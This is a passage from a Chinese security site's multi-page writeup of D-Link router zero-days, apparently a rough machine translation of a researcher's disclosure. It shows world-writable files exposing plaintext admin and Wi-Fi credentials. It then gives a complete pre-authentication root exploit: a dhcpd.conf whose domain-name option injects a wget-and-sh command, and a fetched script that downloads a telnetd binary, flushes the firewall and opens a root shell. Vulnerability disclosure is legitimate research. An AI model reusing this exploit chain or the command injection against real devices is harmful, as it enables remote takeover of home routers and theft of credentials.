欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

D-link十个漏洞0Day研究(附上详细过程)

来源:本站整理 作者:佚名 时间:2017-09-13 TAG: 我要投稿
一些文件权限较弱:
1. /var/passwd
/var/passwd 明文保留用户证书,而该文件权限是-rw-rw-rw- (666)。
# ls -la /var/passwd
-rw-rw-rw-    1 root     root           28 Jan  1 00:00 /var/passwd
# cat /var/passwd
"Admin" "password" "0"
2. /var/etc/hnapasswd
攻击入侵者也能够应用 /var/etc/hnapasswd 提取明文的暗码,/var/etc/hnapasswd 文件权限也是-rw-rw-rw- (666)
# cat /var/etc/hnapasswd
Admin:password
# ls -la /var/etc/hnapasswd
-rw-rw-rw-    1 root     root           20 Jan  1 00:00 /var/etc/hnapasswd
3. /etc/shadow
/etc/shadow 的权限是rwxrwxrwx(777)
# ls -al /etc/shadow
lrwxrwxrwx    1 root     root           15 Jan 20  2017 /etc/shadow -> /var/etc/shadow
# ls -la /var/etc/shadow
-rw-r--r--    1 root     root           93 Jan  1 00:00 /var/etc/shadow
/var/etc/shadow 内有治理用户的DES哈希值。
# cat /var/etc/shadow
root:!:10956:0:99999:7:::
nobody:!:10956:0:99999:7:::
Admin:zVc1PPVw2VWMc:10956:0:99999:7:::
4. /var/run/storage_account_root
/var/run/storage_account_root 含有明文证书。
/var/passwd 文件权限是 -rw-rw-rw- (666)
# ls -la /var/run/storage_account_root
-rw-rw-rw-    1 root     root           40 Jan  1 00:00 /var/run/storage_account_root
# cat /var/run/storage_account_root
admin:password,:::
jean-claude:dusse,:::
5. /var/run/hostapd*
/var/run/hostapd* 含有 明文的无线暗码,文件权限是-rw-rw-rw- (666)
# ls -la /var/run/hostapd*
-rw-rw-rw-    1 root     root           73 Jan  1 00:00 /var/run/hostapd-wlan1wps.eap_user
-rw-rw-rw-    1 root     root         1160 Jan  1 00:00 /var/run/hostapd-wlan1.conf
-rw-rw-rw-    1 root     root           73 Jan  1 00:00 /var/run/hostapd-wlan0wps.eap_user
-rw-rw-rw-    1 root     root         1170 Jan  1 00:00 /var/run/hostapd-wlan0.conf
# cat /var/run/hostapd*|grep -i pass
wpa_passphrase=aaaaa00000
wpa_passphrase=aaaaa00000
Pre-Auth RCEs as root (L2)细节
路由器上的DHCP客户端易遭到敕令注入攻击入侵。
dhcpd.conf文件:
rasp-pwn-dlink# cat /etc/dhcp/dhcpd.conf
option domain-name ";wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re;";
option domain-name-servers 8.8.8.8, 8.8.4.4;
default-lease-time 600;
max-lease-time 7200;
ddns-update-style none;
subnet 10.254.239.0 netmask 255.255.255.224 {
  range 10.254.239.10 10.254.239.20;
  option routers 10.254.239.1;
}
rasp-pwn-dlink# ifconfig eth1
eth1      Link encap:Ethernet  HWaddr 00:0e:c6:aa:aa:aa 
          inet addr:10.254.239.1  Bcast:10.254.239.255  Mask:255.255.255.0
          inet6 addr: fe80::20e:caaa:aaaa:aaa/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:129 errors:0 dropped:0 overruns:0 frame:0
          TX packets:107 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:11181 (10.9 KiB)  TX bytes:49155 (48.0 KiB)
rasp-pwn-dlink# cat /var/www/html/dhcp-rce
#!/bin/sh
wget -O /var/telnetd-dhcpd-wan http://10.254.239.1/dlink-telnetd
chmod 777 /var/telnetd-dhcpd-wan
(for i in 0 1 2 3; do # win races against legit iptables rules
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
sleep 10
done ) &
/var/telnetd-dhcpd-wan -l /bin/sh -p 110 &
rasp-pwn-dlink# dhcpd eth1
Internet Systems Consortium DHCP Server 4.3.1
Copyright 2004-2014 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Config file: /etc/dhcp/dhcpd.conf
Database file: /var/lib/dhcp/dhcpd.leases
PID file: /var/run/dhcpd.pid

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载